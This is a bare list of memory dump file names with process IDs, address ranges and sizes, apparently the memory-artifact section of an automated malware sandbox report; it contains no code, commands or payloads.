- memory/1892-330-0x0000016C44700000-0x0000016C44720000-memory.dmp  (Filesize 128KB)
- memory/1892-325-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp  (Filesize 128KB)
- memory/1892-326-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp  (Filesize 128KB)
- memory/1892-329-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp  (Filesize 128KB)
- memory/1892-327-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp  (Filesize 128KB)
- memory/2424-131-0x000001F39EE00000-0x000001F39EE76000-memory.dmp  (Filesize 472KB)
- memory/2424-126-0x000001F39EC50000-0x000001F39EC72000-memory.dmp  (Filesize 136KB)
- memory/2424-120-0x0000000000000000-mapping.dmp
- memory/3232-289-0x0000000000000000-mapping.dmp
- memory/3496-267-0x0000000000000000-mapping.dmp
- memory/3544-206-0x0000000000000000-mapping.dmp
- memory/3644-160-0x0000000000000000-mapping.dmp
- memory/3696-159-0x0000000000000000-mapping.dmp
- memory/3988-306-0x0000000000000000-mapping.dmp
- memory/4128-223-0x0000000000000000-mapping.dmp
- memory/4196-176-0x0000000000000000-mapping.dmp
- memory/4308-172-0x0000000000000000-mapping.dmp
- memory/4324-161-0x0000000000000000-mapping.dmp
- memory/4356-307-0x0000000000000000-mapping.dmp
- memory/4432-309-0x00007FF7B55914E0-mapping.dmp
- memory/4508-184-0x0000000000000000-mapping.dmp
- memory/4612-312-0x0000000000000000-mapping.dmp
- memory/4652-264-0x0000000000000000-mapping.dmp
- memory/4688-265-0x0000000000000000-mapping.dmp
- memory/4804-271-0x0000000000000000-mapping.dmp
- memory/5004-175-0x0000000000000000-mapping.dmp